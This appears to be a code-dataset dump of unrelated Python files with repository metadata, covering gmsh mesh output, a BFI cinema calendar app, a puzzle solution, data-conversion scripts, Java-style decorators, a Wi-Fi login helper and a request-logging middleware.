fid.write("LOOKUP_TABLE defaul\n") np.savetxt(fid, data[3*count+2][k][:, count2], \ fmt = '%6.6f') count2 = count2+1 k = k+1 count = count+1 fid.close() return 0 def write_msh(output, nodes, elements, physicalEnt = 'line'): """ This funtion intends to create a file of gmsh format containing the characteristics of a given mesh and its inherent object. For now this program accepts nodes and elements from a 1D problem and returns the files Parameters: ----------- output: Name given for the output file nodes: nodes elements: Elements Physical: entities lines (for now) Returns: ---------- output.msh Nodes and elements in gmsh format output.geo Physical entities contained """ n_elements = str(np.shape(elements)[0]) size_elements = str(np.size(elements)) n_nodes = nodes.shape[0] # Creates the output file for the mesh f = open(output, 'w') # Creates the output file for the geometry by stripping the original name # and adding the .geo format g = open(output.strip('.msh')+'.geo','w') g.write('// Gmsh proyect\n') #-----------------Physical entities 1D----------------------------------- if nodes.ndim == 1: xmin = str(nodes[0]) xmax = str(nodes[nodes.size-1]) g.write('Point(1)={'+xmin+',0,0,1.0};\n') g.write('Point(2)={'+xmax+',0,0,1.0};\n') g.write('Line(3)={1,2};\n') else: print 'dimension not supperoted yet' g.close() #------------------------------------------------------------------------ #------------------------ Headers for .msh file------------------------ f.write('$MeshFormat\n') f.write('2.2 0 8\n') f.write('$EndMeshFormat\n') #------------------------ nodes for the .msh file------------------------ f.write('$Nodes\n') vec = np.zeros((np.shape(nodes)[0], 1)) for i in range(0,np.shape(nodes)[0]): vec[i,0] = i+1 # Enumeration of nodes if nodes.ndim==1: nodes = np.array([nodes]).T # Conversion for coordinates with y and z nodes = hstack((nodes,np.zeros((np.shape(nodes)[0], 2)))) nPoi = str(np.shape(nodes)[0]) nodes = hstack((vec, nodes)) # Enumeration added to the array f.write(nPoi+'\n') np.savetxt(f, nodes, fmt = '%d %f %f %f') f.write('$EndNodes\n') #------------------------ Elements for the .msh file------------------------ f.write('$Elements\n') f.write(n_elements+'\n') n_elements=int(n_elements) vec=np.zeros((n_elements,5)) NodPerEl=elements.ndim # For line elements there should be 2 nodes per element # Point elements ------------------------------------------------------- if NodPerEl==2: ePoints=np.zeros((2,6)) ePoints[0,:]=[1,15,2,0,1,1] ePoints[1,:]=[2,15,2,0,2,n_nodes] np.savetxt(f,ePoints,fmt='%d') #----------------------------------------------------------------------- # Line elements 1D ----------------------------------------------------- if NodPerEl==2: for i in range(0,n_elements): vec[i,0]=i+3 vec[i,1:5]=[1,2,0,3] ## elements =elements[:,1:5] #----------------------------------------------------------------------- # Line elements 2D ----------------------------------------------------- else: for i in range(0,n_elements): vec[i, 0] = i+1 vec[i, 1:5] = [2,2,0,6] elements = elements[:, 1:5] #----------------------------------------------------------------------- elements = hstack((vec, elements)) if NodPerEl==2: np.savetxt(f, elements, fmt = '%d %d %d %d %d %d %d') else: np.savetxt(f, elements, fmt = '%d %d %d %d %d %d %d %d') f.write('$EndElements\n') def write_solver_input(output, dimension = 1, bc_type = 'Dir', parameter = [],\ eq = 'Schro', sol_type = 'Stationary', \ analysis_param = ['y', 'y', 4, 4, 20, 20, 2], \ bc_filename = ''): """ Write the solver input into a file of gmsh ASCII format V2.2. This input is to be read by the Solver module. Parameters: ----------- output: String with the name of the file that contains the information regarding the geometry, mesh, border conditions, and other parameters necessary for the solution of the problem. This file is a modified Gmsh output file with extension .msh dimension: int parameter that tells the program wether to solve for a 1D problem or a 2D problem (not supported yet) parameter: Is an array that describes the potential actuating over the the elements of the domain given by Elems. For each element in Elems there is an associated potential value on the same position in the array parameter. The potential in Scroedinger equation defines the specific nature of the problem to be solved. For more details on how to define a potential and what does it mean pleas read the documentation of the Potential1D function in the module PrePro. bc_type: String parameter for the selection of a border condition that can be either: 'Dir' For the Dirichlet border condition (Infinite potential well). 'Bloch' For the periodic formulation of the problem. (Electron in a periodic material ) sol_type: String that tells wether to solve the stationary version of the equation or another not yet suported. 'Stationary' analysis_Param: Array that contains the information regarding the number of solutions to be computed and wether to save the values or not. analysis_param[0]: String answer to the question save Eigen Values? analysis_param[1]: String answer to the question save Eigen Vectors? analysis_param[2]: Integer number of Eigen Values to save analysis_param[3]: Integer number of Eigen Vectors to save analysis_param[4]: Integer number of wave numbers in x to sweep analysis_param[5]: Integer number of wave numbers in y to sweep analysis_param[6]: biggest value of k. it may be the lenght of the dommain bc_filename: string that tells where to look for the boundary conditions Returns: -------- Last modification: date 25/10/2011 """ f = open(output, 'r+') line = f.readline() while '$Solver' not in line: here = f.tell() line = f.readline() if '$Solver' in line: f.seek(here) f.truncate() break if line == '': break f.write('$Solver input\n') dimension = str(dimension) f.write(dimension +'\n') f.write(bc_type +'\n') np.savetxt(f, parameter, fmt = '%f') f.write(eq +'\n') f.write(sol_type +'\n') b = str(analysis_param) b = b.replace("'", "") f.write(b+'\n') f.write(bc_filename+'\n') f.write('$End Solver input\n')
UTF-8
Python
false
false
2,014
19,567,871,008,730
58130897d5d94f27284b81b2fc2ef8661cf02acf
ac3bee33ff69b98ceb4a30b130684af7d37d4eba
/SUMUP.py
41e25f8925c0fb9ba98605bb2c5bbefba45ad97b
[]
no_license
swapnil-warke/spoj.pl_solutions
https://github.com/swapnil-warke/spoj.pl_solutions
154441fe9f44e117039c9b22988426f5dac044c2
d7699780c52471a8fb0e5d7a6c4ebeb4a070e4dc
refs/heads/master
2021-05-29T01:17:20.092948
2013-01-18T21:58:39
2013-01-18T21:58:39
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
def S(n): return (1/2)*(1-(1/(n**2+n+1))) for t in range(int(input())): print("{0:.5f}".format(S(int(input()))))
UTF-8
Python
false
false
2,013
910,533,091,768
395e9ed8c8ff90f495c49ecd42fb0a33b5407e87
84a3f5518ed48ce353f4aef88ca5a8392f768af3
/python/bieber/bieber.py
6c5a7e45fd07ec3b8393b7b40e3d440d0bbd9b69
[]
no_license
seishinryohosha/school
https://github.com/seishinryohosha/school
e36054314db42a69e456672b6f593118e5715848
0d4f77a513d165aee1fdf4a326159fbeed4f9808
refs/heads/master
2020-12-24T14:56:59.891485
2014-12-09T07:22:48
2014-12-09T07:22:48
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python def printDiagramm(n): """Prints diagram of biebers way""" friends = [] sign = '<' for i in range(n): friends.append(97+i) # Char 97 = 'a' for i in range(0, n-1, 2): print(chr(friends[i]), " ", chr(friends[i+1]), " ", end="") if n%2 != 0: print(chr(friends[n-1]), end="") print() for i in range(0, n-1, 2): print("-- -- ", end="") if n%2 != 0: print("-- --", end="") print() def whichFriendToVisit(n, d): if (d > n): d %= n printDiagramm(7)
UTF-8
Python
false
false
2,014
4,544,075,406,181
f5624d92334f0124191c46e256d914d03bcdec7e
a6ccedc7fcd640700b6fd524cc53f24763a8f770
/collect_go.py
2a1f069a539ea2416b67feecf16602a7b460d48a
[]
no_license
mikheyev/monomorium-polyethism
https://github.com/mikheyev/monomorium-polyethism
e2e5bf3bbb8796fcbcb8dd052b41c0f607f53ad7
ff2bc47821748a776747af108d03cc27578aa6f2
refs/heads/master
2020-04-29T02:41:11.719739
2014-12-02T00:40:46
2014-12-02T00:40:46
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pdb """ collect go terms from file, and convert them into sql-friendly csv """ infile = open("blast2go_export.txt") goTable = open("go_table.csv","w") goTable.write("isoform,GO\n") blastTable = open("blast_table.csv","w") blastTable.write("isoform,evalue,hit,species\n") infile.readline() for line in infile: line=line.split("\t") blastTable.write(",".join(line[0:2]+['"'+line[2].split("[")[0].rstrip()+'"']+[line[3]])+"\n") for go in line[4].split(";"): goTable.write(",".join([line[0],go.strip()])+"\n")
UTF-8
Python
false
false
2,014
137,438,987,971
978541c53c65c9227b2fa802ab602da48ff8ca4a
efbe083d80cb0264dc389ce81fa2f52b3e671230
/j2py/java/decorators.py
ffd410a50f4c7751033e0f28592bd346bc95d90a
[]
no_license
jamesonquinn/java2python
https://github.com/jamesonquinn/java2python
b2e0b994a06a4b1b6e82e650772a0c06bf00d678
a70e42886312a7dff97f3fa13e2b35efabfcf880
refs/heads/master
2021-01-18T16:52:09.866626
2010-11-09T19:14:20
2010-11-09T19:14:20
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from inspect import isfunction def static(something): #print "@static", something,isfunction(something) if isfunction(something): return classmethod(something) else: return staticclass(something) def abstract(f): return f def protected(f): return f def volatile(f): return f def final(f): return f def private(f): return f def public(f): return f def constructor(func): return func def interface(*methodNames): def rememberMethods(c): c.__nummethods__ = len(methodNames) c.__methodnames__ = methodNames return c return rememberMethods class dummyClass(object): pass def makeNewFun(f,pos,t): """Return a verson of f which can take a function as argument number pos, by putting it as the method of an object of interface t""" def newFun(*args): if len(args) > pos and callable(args[pos+1]): # pos+1 because "self" is at 0 newargs = list(args) dummyO = dummyClass() dummyO.__setattr__(t.__methodnames__[0],args[pos+1]) newargs[pos+1] = dummyO return f(*newargs) else: return f(*args) return newFun def typed(*sig): def add_sig(f): #functions whose signature includes a one-method interface should accept a function there too; #it's more pythonic that way for pos,t in enumerate(sig): if hasattr(t,"__nummethods__") and t.__nummethods__ == 1: f = makeNewFun(f,pos,t) #now just note the type signature f._type_sig = sig return f return add_sig def typeid(a): if isinstance(a,list) or isinstance(a,tuple): return tuple(typeid(i) for i in a) elif isinstance(a,type): return a else: return type(a) def argtypeid(a,d=0): if isinstance(a,tuple): return tuple(argtypeid(i,d+1) for i in a) elif isinstance(a,list): return (argtypeid(a[0]),) #TODO: add check, if all types are equal else: t = type(a) if t == unicode: t = str return t class init(object): def __repr__(self): if self.klass is None: return "<init decorator for %s>" % repr(self.init) else: return "<init %s>" % self.klass.__name__ def __init__(self,f): #print "@init __init__",self,f self.registry = {} self.self = None self.klass = None self.init = f self.inits = None def __get__(self,obj,klass): #print "@init __get__",self,obj,klass if obj is not None: self.self = obj self.klass = klass return self def register_func(self, func, sig): #print "@init register_func",self,func,sig key = typeid(sig) self.registry[key] = func def register(self,func): #print "@init register",self,func self.register_func(func,func._type_sig) return self def _super(self,*a): key = argtypeid(a) #print "init super",a,"key",key for i in reversed(self.inits[:-1]): func = i.registry.get(key,None) if func is not None: #print " call super", func func(self.self,*a) return def __call__(self,*a): key = argtypeid(a) #print "@init __call__",self,a,key # find constructors for base classes if self.inits is None: k = self.klass inits = [] while True: inits.insert(0,k.__init__) #print " .. bases", k.__bases__ base_found = False for b in k.__bases__: try: i = b.__init__ #print " ...init=",i if isinstance(b.__init__,init): #print "found one",b k = b base_found = True except: pass #print "no java baseclass",b if not base_found: break #print " ... inits:",inits self.inits = inits # call __init__ for all java base classes for i in self.inits: #print " var-init",i.init i.init(self.self) # find and call __init__(key) #inits.reverse() for i in reversed(self.inits): func = i.registry.get(key,None) if func is not None: #print " constr init", func func(self.self,*a) return if key == tuple(): #print "@init __call__ () not registered" pass else: raise RuntimeError("No constructor found for signature " + str(key)) class innerclass(object): def __init__(self,innerclass): #print "innerclass init",innerclass self.innerclass = innerclass def __get__(self,obj,typename): #print "innerclass get",obj,typename self.upperclass = typename self.innerclass.upperclass = typename return self.innerclass class staticclass(object): def __init__(self,innerclass): #print "staticclass init",innerclass self.innerclass = innerclass def __get__(self,obj,t): #print "staticcclass get",obj,t self.self = obj self.t = t return self def __call__(self,*a): #print "staticclass call",a return self.innerclass.__get__(None,self.t) class overloaded(object): def __init__(self,f): #print "overloaded init",f self.registry = {} try: self.register_func(f,f._type_sig) except: self.register_func(f,tuple()) def __get__(self,obj,t): #print "overloaded get",obj,t self.self = obj self.t = t return self def register_func(self, func, sig): key = typeid(sig) self.registry[key] = func def register(self,f): self.register_func(f,f._type_sig) return self def __call__(self,*a): #print "overloaded call",a key = argtypeid(a) func = self.registry.get(key,None) if func is not None: if self.self is not None: return func(self.self,*a) else: return func(*a) else: raise RuntimeError("no function for signature " + str(key)) def implements(*interfaces): def helper(klass): klass._interfaces = interfaces return klass return helper def extends(*interfaces): def helper(klass): klass._extends = interfaces return klass return helper def use_class_init(klass): klass.class_init() return klass
UTF-8
Python
false
false
2,010
4,028,679,356,801
a6d0d4b6d657c70ca22f3e01aa885b3eafcdefe9
ca107dcf9a2bff9a1533f969293a25da9c11aa5c
/other/scan_dir.py
59bd0f3ea016592dd7fc3a51d1afd6ee6c08bb5e
[ "CC-BY-NC-ND-3.0", "GPL-3.0-only" ]
non_permissive
CubeSugar/MiniSearchEngine
https://github.com/CubeSugar/MiniSearchEngine
23a1ff15d7565108f1a7a0973f88a25941462c02
850259231156ac45c146ac92957b96549854d802
refs/heads/master
2021-01-19T08:33:46.803784
2013-08-15T15:47:54
2013-08-15T15:47:54
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
''' P2 Project scan RawData dir ''' import os import sys ''' v1.0 def getDirList(path, level = 0, indent = True): if indent: for tab in range(level): print('\t', end = '') DirList = os.listdir(path) for each_file in DirList: if os.path.isdir(each_file): getDirList(each_file, level + 1) else: print(each_file) ''' ''' v1.1 print dir tree ''' def getDirList(path, level = 0, indent = True): DirList = os.listdir(path) for each_file in DirList: if indent: for tab in range(level): print(' ', end = '') print(path + '/' + each_file) subpath = os.path.join(path, each_file) if os.path.isdir(subpath): getDirList(subpath, level + 1) ''' define function print file name to a txt ''' def storeFileName(path): DirList = os.listdir(path) for each_file in DirList: subpath = os.path.join(path, each_file) if os.path.isdir(subpath): storeFileName(subpath) else: try: with open('result.txt', 'a') as ResultFile: print(each_file, file = ResultFile) except IOError as err: print('IOError :' + str(err)) def storeDirPath(path): DirList = os.listdir(path) #oldPath = path storePath = [] for each_file in DirList: subpath = os.path.join(path, each_file) if os.path.isdir(subpath): #oldPath = subpath storeDirPath(subpath) else: print(os.path.dirname(subpath)) ''' try: with open('dp.txt', 'w') as dp: for each_item in storePath: print(each_item, file = dp) except IOError as err: print('IOError : ' + str(err)) ''' #print(os.getcwd()) #os.chdir('../Documents/ProgrammingExercise/Project/P2') rootpath = './RawData' testpath = './Test' #getDirList(testpath) #storeFileName(testpath) storeDirPath(rootpath)
UTF-8
Python
false
false
2,013
9,646,496,551,273
9f648e9c87636c317e680b49f812b404119221eb
b2289688ef0f2f6df16d4600742bcdfc1d373def
/massmail.py
d109f81d757c43a0757bce202a8666222c8c32c1
[]
no_license
FranciscoDA/hotel-booking
https://github.com/FranciscoDA/hotel-booking
9e422791899a61ae9321a67996595fd16b3de36c
7ef90904e3ec51bbb70d8bd9d06e3def78024204
refs/heads/master
2020-04-05T23:29:17.427093
2014-08-05T04:55:44
2014-08-05T04:55:44
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# A mass mail test. # Not quite sure of wtf was I trying to accomplish here... from booking.models import Guest mails = [guest.email for guest in Guest.objects.all()] rec = ['[email protected]', '[email protected]',] subject = 'Envío masivo' msg = 'Ahora sí. Un mail por cada destinatario.' print(mails)
UTF-8
Python
false
false
2,014
18,786,186,957,880
cb19b0f93caa2684b53741e84e69bc99128e2c9d
a88356572f205319a779255715f533c850d62337
/kapai/services/passport/__init__.py
053fe0127ad10c37a502aa08dfb46409fefb1600
[]
no_license
zaykl/kae
https://github.com/zaykl/kae
89795fa059819d70d1f68101aa793069749cd283
831d04caff9b8de07310de019d3ac479a7df21f9
refs/heads/master
2015-08-07T22:56:35.859724
2013-05-26T04:34:51
2013-05-26T04:34:51
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# -*- coding:utf-8 -*- # 导入函数 from passport import *
UTF-8
Python
false
false
2,013
6,966,436,965,929
f7b6ce26c97a5864fac32d370c1f89c65c6fcf05
c7715f2c08e8bd6b42d574637b01b9212b34b1bc
/monoalphabetic.py
190175f05585426cd72f08b58f3c6da5fd96d503
[]
no_license
B-Rich/Ciphers
https://github.com/B-Rich/Ciphers
702e69b95d767c996e1e4b8cebeec88f229ac570
e1655813bf9120106c3acc29d319959deb22624d
refs/heads/master
2021-01-15T08:20:04.582330
2012-08-07T18:44:45
2012-08-07T18:44:45
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/python2.7 import argparse import string def get_sub_map(from_alphabet,to_alphabet): ''' Creates the dictionary for substitution lookup. Uses from_alphabet as keys and to_alphabet as values ''' sub_map = {} for i in range(len(from_alphabet)): sub_map[from_alphabet[i]] = to_alphabet[i] return sub_map def substitute(in_text,substitution_map): out_text = [] for i in in_text: if i not in substitution_map: out_text.append(i) else: out_text.append(substitution_map[i]) return ''.join(out_text) def create_cipher(args): """ A simple monoalphabetic substitution cipher with a user-supplied alphabet. Note that we are only working with letters so the supplied alphabet must be 26 characters long. """ if args.text: in_text = args.text.upper() elif args.file: in_text = open(args.file).read().upper() if args.cipher: sub_map = get_sub_map(string.ascii_uppercase,args.alphabet) elif args.decipher: sub_map = get_sub_map(args.alphabet,string.ascii_uppercase) return substitute(in_text,sub_map) parser = argparse.ArgumentParser(description="A cipher") parser.add_argument('--cipher','-c',help="Cipher the text", action="store_true") parser.add_argument('--decipher','-d',help="Decipher the text", action="store_true") parser.add_argument('--text','-t',help="The text to work on.") parser.add_argument('--file','-f',help="The file to work on.") parser.add_argument('alphabet',help="The substitution alphabet to use.") parser.set_defaults(func=create_cipher) args=parser.parse_args() print args.func(args)
UTF-8
Python
false
false
2,012
1,314,259,992,991
4150312d90908bd55fefb996f222335ab8b41ba6
ebb9b9319115f9163984eca18edf3d7d61c1f4d7
/tasks.py
12895c2a06d2fa3fca67abc219a07258554209c2
[]
no_license
benburry/bfical
https://github.com/benburry/bfical
a4409b39ff3c5c526329f54df474a28086ddc54d
1c2ea6434390e3fab12936b8ee5b460cfed74a14
refs/heads/master
2020-04-05T23:04:11.752531
2010-12-11T00:34:13
2010-12-11T00:34:13
1,009,870
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from BFIParser import BFIParser from google.appengine.ext import webapp from google.appengine.ext.webapp import util from google.appengine.api.labs import taskqueue from google.appengine.api import memcache from google.appengine.ext import db from google.appengine.ext import ereporter from google.appengine.ext.webapp import template from models import Event, Showing from datetime import date, timedelta from icalendar.cal import Calendar, Event as CalEvent import time import logging import os import pytz ereporter.register_logger() DEBUG = os.getenv('SERVER_SOFTWARE').split('/')[0] == "Development" if os.getenv('SERVER_SOFTWARE') else False QUEUE_RETRY = 5 ICS_CACHEKEY_TMPL = 'cal-%s-%s' HOME_CACHEKEY_TMPL = 'home-%s' LATCH_CACHEKEY_TMPL = 'lat-%s-%s' GB_TZ = pytz.timezone('Europe/London') def generate_homepage(location='southbank', weekoffset=0): today = date.today() if weekoffset > 0: startdate = today + timedelta((weekoffset * 7) - today.weekday()) enddate = startdate + timedelta(7) else: startdate = today enddate = startdate + timedelta(7 - startdate.weekday()) showings = db.Query(Showing).filter("master_location", location).filter("start >=", startdate).filter("start <", enddate).order("start").fetch(1000) path = os.path.join(os.path.dirname(__file__), 'templates', 'index.html') return template.render(path, {"showings": showings, "location": location, "page": weekoffset, "startdate": startdate,}) def generate_ics(showings, location): calendar = Calendar() caplocation = location.capitalize() calendar.add('prodid', '-//BFiCal %s Calendar//bfical.com//' % caplocation) calendar.add('version', '2.0') for showing in showings: if showing.master_location == location: calevent = CalEvent() if showing.ident: calevent.add('uid', '%[email protected]' % showing.ident) else: calevent.add('uid', '%[email protected]' % int(time.time())) calevent.add('summary', showing.parent().name) calevent.add('description', showing.parent().precis) calevent.add('location', '%s, BFI %s, London' % (showing.location, caplocation)) calevent.add('dtstart', showing.start.replace(tzinfo=GB_TZ).astimezone(pytz.utc)) calevent.add('dtend', showing.end.replace(tzinfo=GB_TZ).astimezone(pytz.utc)) calevent.add('url', showing.parent().src_url) calevent.add('sequence', int(time.time())) # TODO - fix #calevent.add('dtstamp', datetime.datetime.now()) calendar.add_component(calevent) return calendar def generate_calendar(location = 'southbank', sublocation=None): showings = db.Query(Showing).filter("start >=", date.today()) if sublocation is not None: showings = showings.filter("location", sublocation) return generate_ics(showings, location) def continue_processing_task(request): retrycount = request.headers['X-AppEngine-TaskRetryCount'] logging.debug("Queue retry count:%s" % retrycount) return retrycount is None or int(retrycount) <= QUEUE_RETRY class UpdateHandler(webapp.RequestHandler): def get(self): return self.post() def post(self, location='southbank'): memcache.set(ICS_CACHEKEY_TMPL % (location, None), generate_calendar(location, None), time=1800) listing_urls = BFIParser.generate_listing_urls() countdown = 1 cachekey = LATCH_CACHEKEY_TMPL % (location, time.time()) for url in listing_urls: logging.debug("Queueing listing url:%s" % url) taskqueue.add(url='/tasks/process_listings_url', params={'url': url, 'cachekey': cachekey}, queue_name='background-queue', countdown=countdown) countdown = countdown + 1 self.response.out.write(listing_urls) class PurgeHandler(webapp.RequestHandler): def get(self): self.post() def post(self): memcache.flush_all() db.delete(Showing.all()) db.delete(Event.all()) handler = UpdateHandler() handler.initialize(self.request, self.response) handler.post() class ListingsHandler(webapp.RequestHandler): def post(self): if continue_processing_task(self.request): (year, urls) = BFIParser.parse_listings_page(self.request.get('url')) countdown = 1 cachekey = self.request.get('cachekey') for url in urls: if memcache.get(url) is None: memcache.set(url, 1, time=1800) logging.debug("Queueing event url:%s" % url) remaining = memcache.incr(cachekey, initial_value=0) logging.debug("Incremented remaining count to %s" % remaining) taskqueue.add(url='/tasks/process_event_url', params={'url': url, 'cachekey': cachekey, 'eventyear': year}, queue_name='background-queue', countdown=countdown) countdown = countdown + 1 self.response.out.write(url) else: logging.debug("Already process(ed|ing) url %s" % url) class GenerateHandler(webapp.RequestHandler): def post(self): for location in BFIParser.LOCATIONS: memcache.set(HOME_CACHEKEY_TMPL % location, generate_homepage(location), time=86400) memcache.set(ICS_CACHEKEY_TMPL % (location, None), generate_calendar(location, None), time=86400) class EventHandler(webapp.RequestHandler): def post(self, location='southbank'): if continue_processing_task(self.request): eventurl = self.request.get('url') eventyear = int(self.request.get('eventyear')) cachekey = self.request.get('cachekey') logging.debug("Processing event url %s for year %s" % (eventurl, eventyear)) # Parse page bfievent = BFIParser.parse_event_page(eventurl, eventyear) def persist_showings(dbevent, bfievent): # Delete existing showings for this event db.delete(db.Query(Showing).ancestor(dbevent)) # Save events for showing in bfievent.showings: Showing(parent=dbevent, ident=showing.id, location=showing.location, master_location=location, start=showing.start, end=showing.end).put() event = Event.get_or_insert(key_name=bfievent.url, src_url=db.Link(bfievent.url), name=bfievent.title, precis=bfievent.precis, year=bfievent.year, directors=bfievent.directors, cast=bfievent.cast, description=bfievent.description) event.src_url=db.Link(bfievent.url) event.name=bfievent.title event.precis=bfievent.precis event.year=bfievent.year event.directors=bfievent.directors event.cast=bfievent.cast event.description=bfievent.description event.put() db.run_in_transaction(persist_showings, event, bfievent) logging.debug("Processed event url %s" % eventurl) remaining = memcache.decr(cachekey, initial_value=0) logging.debug("Decremented remaining count to %s" % remaining) if remaining <= 0: db.delete(db.Query(Showing).filter("updated <", date.today())) db.delete(db.Query(Event).filter("updated <", date.today())) memcache.delete(HOME_CACHEKEY_TMPL % location) taskqueue.add(url='/tasks/generate_calendar') def main(): logging.getLogger().setLevel(logging.DEBUG if DEBUG else logging.WARN) application = webapp.WSGIApplication([ ('/tasks/update', UpdateHandler), ('/tasks/purge', PurgeHandler), ('/tasks/process_listings_url', ListingsHandler), ('/tasks/process_event_url', EventHandler), ('/tasks/generate_calendar', GenerateHandler), ], debug=DEBUG) util.run_wsgi_app(application) if __name__ == '__main__': main()
UTF-8
Python
false
false
2,010
13,761,075,254,120
730da492e2de7bfa496073d0369f47b4e4241051
1e754d56215f70bf5d16aa18bf064cd6c804bbca
/OtherCodeIhaveYetToSiftThrough/Sigil Project/Previous Work/CE proj/Previous Releases/CameraEnginePR.0.2.0/CameraEngine/__init__.py
eac7bda183e1337f45dc4496c11c0c88e5110b9c
[]
no_license
alex-polosky/MyOldCode
https://github.com/alex-polosky/MyOldCode
b4cd2113b33c0bc7a985f1f1c27a1081a874ad00
a4c80f14b0aad05621e517999b8eaf991808a08f
refs/heads/master
2020-02-05T17:14:37.241508
2014-05-01T04:07:06
2014-05-01T04:07:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pygame import screen import sprite import tools import version import world # I want to implement a simple HUD class # Use the HUD class for displaying any # scores or other important data # also, perhaps a Particles Engine #class MainLoop(): # # def __init__(self): # pygame.init() # #S = screen.Screen((800, 600), "Test", 0) #if __name__ == '__main__': #ML = MainLoop()
UTF-8
Python
false
false
2,014
13,984,413,516,627
7dd2176c3aa232509fb7e94ef08fe763aaeac3ba
e4eb65fb5e42d8ac602f02b78a699fa38c90741d
/output-habitats.py
87784be85b2bfd59aa007aede54a081609e92ccd
[]
no_license
perlfu/open-habitats
https://github.com/perlfu/open-habitats
bcf55f917aa3493f8b37473f6d8796e3c7525b1f
179b160ef04d153e2a76402d2a47ac1095906250
refs/heads/master
2020-04-06T14:09:45.698046
2014-05-12T10:12:49
2014-05-12T10:12:49
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import sys import psycopg2 import json import shapely.wkt from habitats import * limits = { H_NONE: 0, H_URBAN: 100, H_WOOD: 0, H_WETLAND: 30, H_WATER: 20, H_RIVER: 20, H_GRASSLAND: 30, H_ARABLE: 150, H_SEMINATURAL: 30, H_MOUNTAIN: 0 } if len(sys.argv) < 2: print 'output-habitats <destination>' sys.exit(1) destination = sys.argv[1] conn = psycopg2.connect("dbname=gis") cur = conn.cursor() cur.execute("SELECT link_id, polygon_id FROM habitat_link") results = cur.fetchall() transports = [] _links = {} links = {} for (link_id, polygon_id) in results: if polygon_id not in links: links[polygon_id] = set() links[polygon_id].add(link_id) _links[link_id] = True for link_id in _links.keys(): transports.append({ 'id': str(link_id), 'type': 'land' }) results = [] for h_type in limits.keys(): if limits[h_type] > 0: cur.execute("SELECT polygon_id, h_type, ST_AsText(geom) FROM habitat WHERE h_type = %s ORDER BY ST_Area(ST_Transform(geom, 27700)) DESC LIMIT %s;", (h_type, limits[h_type])) results.extend(cur.fetchall()) habitats = [] for (_id, _type, geom) in results: print _id, _type shape = shapely.wkt.loads(geom) points = [] for (x, y) in shape.exterior.coords: points.append(float("%.6f" % x)) points.append(float("%.6f" % y)) if _id in links: _links = map(str, links[_id]) else: _links = [] habitats.append({ 'id': str(_id), 'type': type_map[_type], 'points': points[0:-2], 'regulation': [], 'links': _links }) conn.close() fh = open(destination, 'wb') fh.write("ESD.modelDescriptor['transports'] = ") json.dump(transports, fh, sort_keys=True, indent=2) fh.write(";\n") fh.write("ESD.modelDescriptor['habitats'] = ") json.dump(habitats, fh, sort_keys=True, indent=2) fh.write(";\n") fh.close()
UTF-8
Python
false
false
2,014
9,156,870,295,631
1e110ad7a94bc29bd2bf3b2e20ca83c57e6e2800
b566d27127860bfc3e6ea9eec3c8a3fb173540c4
/utwlan-w_auth.py
d136f80817243ff868958ed05e4a1b8b657e1839
[]
no_license
ytn86/U-Tsukuba-Auth
https://github.com/ytn86/U-Tsukuba-Auth
94b09c845f7d3f77fba10d91d4b9532a9df64eed
13f13339ea3d66682dc320719f1ebfc53c2fb7aa
refs/heads/master
2021-01-10T19:37:11.540896
2014-07-25T10:49:34
2014-07-25T10:49:34
22,253,560
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!python3 from urllib.request import urlopen from urllib.parse import urlencode def auth(id, pw): url = 'https://wlan-auth1.cc.tsukuba.ac.jp/login.html' params = urlencode({'buttonClicked' : '4' , 'err_flag' : '0' ,'username' :id , 'password' : pw , 'Submit' : 'login'}) handler = urlopen(url, params.encode('utf-8')) print(handler.read()) def main(): id = "<Your id>" pw = "<Your password>" auth(id,pw) if __name__ == "__main__": main()
UTF-8
Python
false
false
2,014
4,355,096,869,282
411a68703729283332c6401f287d1e642c8ace66
207288b80ae59f5a40601d5a29dac1303de7b1f4
/main/middleware.py
728c1934051dd209c09eb45841139ccd00f382bc
[]
no_license
Anc813/cctest
https://github.com/Anc813/cctest
7d88248118f86a9d2c7e904c0c5c03608c089da8
327b32ce9af3b81149160afdb7ce8ad043024bba
refs/heads/master
2021-01-01T17:32:10.838102
2013-12-08T18:06:34
2013-12-08T18:06:34
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from .models import HTTPRequest def serialize_value(value): from django.contrib.sessions.backends.db import SessionStore if isinstance(value, (str, unicode)): return value elif isinstance(value, (dict, SessionStore)): result = [] for name, val in value.items(): result.append('%s = %s' % (name, val)) return u'\n'.join(result) elif value is None: return '' else: return 'Unknown' class StoreRequestsDB(object): def process_request(self, request): if request.user.is_authenticated(): user = request.user else: user = None HTTPRequest( path=serialize_value(request.path), path_info=serialize_value(request.path_info), method=serialize_value(request.method), encoding=serialize_value(request.encoding), GET=serialize_value(request.GET), POST=serialize_value(request.POST), COOKIES=serialize_value(request.COOKIES), FILES=serialize_value(request.FILES), META=serialize_value(request.META), user=user, session=serialize_value(request.session) ).save()
UTF-8
Python
false
false
2,013
18,064,632,480,881
7744d6b6e8fcf0c1ec5d323e5388da681e073fe0
cfab0600a37012b34ea8d7e58cc1c140c7f69b5a
/storage.py
3209a9f8f142da08b22bb7c131039ea06f329c5f
[ "GPL-2.0-only" ]
non_permissive
riolowry/cs3780-networks
https://github.com/riolowry/cs3780-networks
c40ccd90b552568f92af201c3597849b56c9c73f
91b591f62a38f6bd641a1ee83e5099a31805bd02
refs/heads/master
2021-01-22T09:48:27.862232
2013-11-29T15:36:08
2013-11-29T15:36:08
13,946,745
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
